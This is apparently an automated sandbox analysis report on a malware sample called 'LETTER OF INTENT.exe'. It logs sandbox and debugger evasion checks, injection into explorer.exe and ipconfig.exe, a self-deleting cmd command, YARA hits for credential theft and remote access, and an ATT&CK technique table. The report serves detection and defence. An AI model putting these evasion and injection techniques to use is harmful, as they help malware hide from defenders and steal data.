            Source: LETTER OF INTENT.exe, 00000000.00000002.245569266.000000000340A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000002A08604 second address: 0000000002A0860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 0000000002A0898E second address: 0000000002A08994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe TID: 6276Thread sleep time: -33322s >= -30000s
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe TID: 6304Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeCode function: 1_2_004088C0 rdtsc 1_2_004088C0
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\explorer.exeFile opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
            Source: C:\Windows\SysWOW64\ipconfig.exeAPI coverage: 8.1 %
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeProcess information queried: ProcessInformation
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exeThread delayed: delay time: 33322
            Source: explorer.exe, 00000003.00000000.257522240.0000000008BB0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: LETTER OF INTENT.exe, 00000000.00000002.245569266.000000000340A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000017.00000000.434106783.0000000006442000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000003.00000000.272293845.000000000891C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: LETTER OF INTENT.exe, 00000000.00000002.245569266.000000000340A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: explorer.exe, 00000017.00000003.438430184.0000000007E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
            Source: explorer.exe, 00000017.00000003.438430184.0000000007E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}rs\DriverDataHOMEDRIVE=C:B
            Source: explorer.exe, 00000017.00000000.434106783.0000000006442000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m
            Source: explorer.exe, 00000003.00000000.274729760.000000000DC67000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000017.00000003.438430184.0000000007E6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BP
            Source: explorer.exe, 00000017.00000000.434106783.0000000006442000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}P
            Source: explorer.exe, 00000003.00000000.341196844.00000000011B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
            Source: explorer.exe, 00000003.00000000.272859933.00000000089B5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
            Source: explorer.exe, 00000003.00000000.249884989.00000000053C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
            Source: explorer.exe, 00000003.00000000.272859933.00000000089B5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
            Source: LETTER OF INTENT.exe, 00000000.00000002.245569266.000000000340A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
            Source: LETTER OF INTENT.exe, 00000000.00000002.245569266.000000000340A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe Code function: 1_2_004088C0 rdtsc
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\ipconfig.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ECFD9B mov eax, dword ptr fs:[00000030h]15_2_02ECFD9B
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ECFD9B mov eax, dword ptr fs:[00000030h]15_2_02ECFD9B
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EBC577 mov eax, dword ptr fs:[00000030h]15_2_02EBC577
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EBC577 mov eax, dword ptr fs:[00000030h]15_2_02EBC577
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02ED3D43 mov eax, dword ptr fs:[00000030h]15_2_02ED3D43
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F13540 mov eax, dword ptr fs:[00000030h]15_2_02F13540
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F43D40 mov eax, dword ptr fs:[00000030h]15_2_02F43D40
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EB7D50 mov eax, dword ptr fs:[00000030h]15_2_02EB7D50
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F68D34 mov eax, dword ptr fs:[00000030h]15_2_02F68D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F1A537 mov eax, dword ptr fs:[00000030h]15_2_02F1A537
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02F5E539 mov eax, dword ptr fs:[00000030h]15_2_02F5E539
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC4D3B mov eax, dword ptr fs:[00000030h]15_2_02EC4D3B
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC4D3B mov eax, dword ptr fs:[00000030h]15_2_02EC4D3B
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EC4D3B mov eax, dword ptr fs:[00000030h]15_2_02EC4D3B
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02E9AD30 mov eax, dword ptr fs:[00000030h]15_2_02E9AD30
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 15_2_02EA3D34 mov eax, dword ptr fs:[00000030h]15_2_02EA3D34
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe; Process queried: DebugPort
            Source: C:\Windows\SysWOW64\ipconfig.exe; Process queried: DebugPort
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe; Code function: 1_2_00409B30 LdrLoadDll, 1_2_00409B30
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe; Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe; Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 2C0000
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe; Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe; Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\ipconfig.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\ipconfig.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\ipconfig.exe; Section loaded: unknown target: unknown protection: read write
            Source: C:\Windows\SysWOW64\ipconfig.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\ipconfig.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\ipconfig.exe; Section loaded: unknown target: unknown protection: read write
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe; Memory written: C:\Users\user\Desktop\LETTER OF INTENT.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe; Thread APC queued: target process: C:\Windows\explorer.exe
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe; Thread register set: target process: 3472
            Source: C:\Windows\SysWOW64\ipconfig.exe; Thread register set: target process: 3472
            Source: C:\Windows\SysWOW64\ipconfig.exe; Thread register set: target process: 1692
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe; Process created: C:\Users\user\Desktop\LETTER OF INTENT.exe C:\Users\user\Desktop\LETTER OF INTENT.exe
            Source: C:\Windows\SysWOW64\ipconfig.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\LETTER OF INTENT.exe"
            Source: explorer.exe, 00000003.00000000.257299403.00000000089FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.273356119.00000000089FF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.270284591.0000000005EA0000.00000004.00000001.00020000.00000000.sdmp; Binary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000003.00000000.248082788.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.264323125.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.342429492.0000000001640000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progman
            Source: explorer.exe, 00000003.00000000.248082788.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.264323125.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.342429492.0000000001640000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: SProgram Managerl
            Source: explorer.exe, 00000003.00000000.279410188.0000000001128000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.263630168.0000000001128000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.340980854.0000000001128000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: ProgmanOMEa
            Source: explorer.exe, 00000003.00000000.248082788.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.264323125.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.342429492.0000000001640000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Shell_TrayWnd,
            Source: explorer.exe, 00000003.00000000.248082788.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.264323125.0000000001640000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.342429492.0000000001640000.00000002.00000001.00040000.00000000.sdmp; Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe; Queries volume information: C:\Users\user\Desktop\LETTER OF INTENT.exe VolumeInformation
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\LETTER OF INTENT.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match; File source: 1.0.LETTER OF INTENT.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.LETTER OF INTENT.exe.4771d60.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 1.0.LETTER OF INTENT.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 1.2.LETTER OF INTENT.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.LETTER OF INTENT.exe.469f500.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.LETTER OF INTENT.exe.4747140.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 1.0.LETTER OF INTENT.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 1.0.LETTER OF INTENT.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 1.2.LETTER OF INTENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 1.0.LETTER OF INTENT.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000000.288819841.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000002.307789008.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000F.00000002.506165216.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000000.242299044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000000.274895699.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000000.242704154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            Source: Yara match; File source: 1.0.LETTER OF INTENT.exe.400000.8.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.LETTER OF INTENT.exe.4771d60.4.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 1.0.LETTER OF INTENT.exe.400000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 1.2.LETTER OF INTENT.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.LETTER OF INTENT.exe.469f500.5.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0.2.LETTER OF INTENT.exe.4747140.6.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 1.0.LETTER OF INTENT.exe.400000.6.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 1.0.LETTER OF INTENT.exe.400000.8.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 1.2.LETTER OF INTENT.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 1.0.LETTER OF INTENT.exe.400000.4.unpack, type: UNPACKEDPE
            Source: Yara match; File source: 0000000F.00000002.505138541.0000000000350000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000002.307845836.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000F.00000002.506368186.0000000002A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000000.288819841.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000002.307789008.00000000010D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000F.00000002.506165216.0000000002700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000000.00000002.248115726.00000000045B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000000.242299044.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000003.00000000.274895699.000000000E458000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000002.303201831.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000001.00000000.242704154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts1
            Shared Modules
            Path Interception512
            Process Injection
            1
            Masquerading
            OS Credential Dumping1
            Query Registry
            Remote Services1
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Encrypted Channel
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Disable or Modify Tools
            LSASS Memory231
            Security Software Discovery
            Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
            Application Layer Protocol
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)41
            Virtualization/Sandbox Evasion
            Security Account Manager2
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)512
            Process Injection
            NTDS41
            Virtualization/Sandbox Evasion
            Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets1
            System Network Configuration Discovery
            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common41
            Obfuscated Files or Information
            Cached Domain Credentials1
            File and Directory Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items3
            Software Packing
            DCSync112
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
            File Deletion
            Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            [Behavior graph (image not reproduced). Behavior Graph ID: 574776; Sample: LETTER OF INTENT.exe; Startdate: 18/02/2022; Architecture: WINDOWS; Score: 100. Process chain: LETTER OF INTENT.exe started LETTER OF INTENT.exe, which injected into explorer.exe; explorer.exe started ipconfig.exe; ipconfig.exe started explorer.exe and cmd.exe; cmd.exe started conhost.exe.]

            Source | Detection | Scanner | Label
            LETTER OF INTENT.exe | 26% | Virustotal |
            No Antivirus matches
            Source | Detection | Scanner | Label
